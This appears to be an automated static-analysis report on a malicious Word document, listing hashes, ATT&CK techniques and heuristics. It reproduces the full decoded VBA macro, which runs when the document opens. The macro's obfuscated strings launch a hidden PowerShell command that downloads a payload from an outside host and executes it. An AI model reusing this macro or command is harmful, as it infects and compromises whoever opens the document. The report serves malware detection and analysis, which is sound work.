Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45ba4ab6b5fce705…

MALICIOUS

Office (OLE)

68.0 KB Created: 2016-05-22 23:26:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: abf17e14d51e2c3118ac0821af4304b1 SHA-1: f1f9ded09384bcf8dbad412897d007201fa67c54 SHA-256: 45ba4ab6b5fce70576b1a0a3c7ec360a54b360e2a0b2495a38508523b2b55258
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The document body explicitly prompts the user to 'Enable Content', indicating a social engineering lure to bypass macro security. The presence of a GetObject call within the auto-executing macro suggests an attempt to interact with or launch other objects or processes.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3736 bytes
SHA-256: bdba64f3d3be7a0a6c882b8aa6aa4bbd57754ba773958e4206e6b24cac614fd6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
eNpLPBK.JyigaHV
End Sub
Private Function hONWoyHtJF(ByVal oZAPR As String, ByVal KHPsH As String) As Boolean
uhwkpvP
aJHMA
XwNrbCWptY
hONWoyHtJF = True
End Function
Private Function OutShNcjQN() As Integer
ULWoe
OutShNcjQN = 7748
End Function
Private Sub cGDVzxiwlz(ByVal YaNHe As Integer, ByVal DoMqeobP As Boolean)
okPmXdV
If jMVqcklQ Then
GyRIm
BjHWq True, "L4kdqe74xqC9fmMVfEQfGNw66", "hwdyJWJdx8dfaLtRDeZGVpXW8"
EgeZkSpucE 8396, "GwLRX20u9gYLsyx598HLIts", "oxmWNQa6S2VQPjipeZODR"
End If
UfhMtyhcr
End Sub

Attribute VB_Name = "buPQt"
Private Function OREYBmIPS(ByVal mSwRnM As String, ByVal LhGeCdXc As String) As String
Dim haxBMHgJ As Integer, zBVRmsd As Integer
If Not jluBD.ykUFRRIR(LhGeCdXc, mSwRnM) Then
OREYBmIPS = mSwRnM
JDljNcAdm = "2O8SlNund9Vb6PIcA"
End If
End Function
Public Function MPKvxO(ByVal ovXYB As String, ByVal NSulZwdvrR As String) As String
For kIGNoWxfk = VrYUurrBOs To jluBD.VdJsf(NSulZwdvrR)
SdkmT = 7401
MPKvxO = jluBD.bQKIhcbOi(MPKvxO, OREYBmIPS(jluBD.nHmPIUC(NSulZwdvrR, kIGNoWxfk), ovXYB))
Next
End Function
Private Function VrYUurrBOs() As Integer
VrYUurrBOs = 1
End Function

Attribute VB_Name = "eNpLPBK"
Private Function AcRcm() As String
AcRcm = buPQt.MPKvxO("yjfGhEB", "wBBihnmEgjGmtBEs:Ef\j\B.\fryGooBjty\Gchiymvy2B:jWGyiBn3G2jf_BPrEoycfejsBsy")
End Function
Private Sub vWxaMGOEc()
Dim GZWNZLS As Boolean, YfKDxAJ As Integer
On Error GoTo XETnMxk
Set DqFkEHV = GetObject(GIjNz)
Set iToZIefQ = DqFkEHV.SpawnInstance_
iToZIefQ.ShowWindow = 0
WSwTE = False
Set kdUANwTNo = GetObject(AcRcm)
kdUANwTNo.Create CRNeke, Null, iToZIefQ
UTGpOWiqqf = False
Exit Sub
XETnMxk:
End Sub
Private Function GIjNz() As String
NdjPKQnCr = "25iL0Eq6DPSGQNEWgkOrYm5zlu3TUCw"
GIjNz = buPQt.MPKvxO("ABDZY6", "BwZinZmBAgmDtBsYA:Z\\6.Z\ArBoZoZYt\DcDiYZmv6B26:WAYiYn36Y2_BDPZroZAcAesDYsSAZtAar66t6upY")
End Function
Private Function CRNeke() As String
CRNeke = buPQt.MPKvxO("R73g06MUZ", "pgo03wUer77shZeMlRRl0.eZxUgeR R-ERxReMcUZut6i03oZn3Po70liZcU0y7 BgyM7paZMs3s 3-0W3Uin3dZo7wg0SRtZylZeZ7 HZMid0d3UeMn3 M-gco3mRRm7a6nd6 U7$ZfiRl3Ue7na7m77eZ=[ZS3y6sMZt6eRm.6I6ZO.30Pgat60h]M:60:gGe3tR3TeZgmp7FggigleZNUgaRmeg(6)U;3(Z0NUe0w3-OMUbUjeMc6t3 URSyZ3stMeUZmg.3Nget0.3RWReRbCRlZi3e7Zn0t)3.ZRD0o6wnRMl0oa6dRFMRilZeR7('R0hMttZpg:M/Z3/6i7lu0gmi06l7i0fUeR.cZRomgM/RsyMs7Zte77m3/cgRacM7hge/Mc7o0nUtU3en7tg0.bg7i6nU',Z0 3$fg7ilUeUn0a3gm3e)Z3;U(Nge30w-ROZbgjMeMZcZtM -Uc6oU6m6 7WUSMc3r3ipZtg.U6S7hReRll3U).gER7xRecR(06$MfMil7RenRa0mUZeg)")
End Function
Public Sub JyigaHV()
Dim OpQzKuzWBa As Integer
LPSXJ = "lUjcFsqGSu2gqdSdfceVUq2DF2NB"
vWxaMGOEc
End Sub

Attribute VB_Name = "jluBD"
Public Function VdJsf(ByVal dWoIc As String) As Integer
Dim iOKwyOJ As Integer
VdJsf = Len(dWoIc)
End Function
Private Sub AIxhJG(ByVal vdCxrC As Integer, ByVal dZJIp As Integer)
CJNrbvYowi "ExaVsM33QZiVP4sgnqk7upWMplR7chc9A"
DGCeV "eRWYamBMQVx7UqZzqXWfS6tZ1409HWoi"
End Sub
Public Function nHmPIUC(ByVal fiXeY As String, ByVal IphFNKuX As Integer) As String
nHmPIUC = Mid(fiXeY, IphFNKuX, 1)
End Function
Public Function bQKIhcbOi(ByVal BjXGuLv As String, ByVal qpQmcZF As String) As String
Dim Qtdyc As String
GkfqvYfaDz = 5351
bQKIhcbOi = BjXGuLv & qpQmcZF
End Function
Public Function ykUFRRIR(ByVal OwSUwAz As String, ByVal hvXPHlFYsd As String) As Boolean
Dim ZpVkKar As String
ykUFRRIR = InStr(1, OwSUwAz, hvXPHlFYsd) <> 0
End Function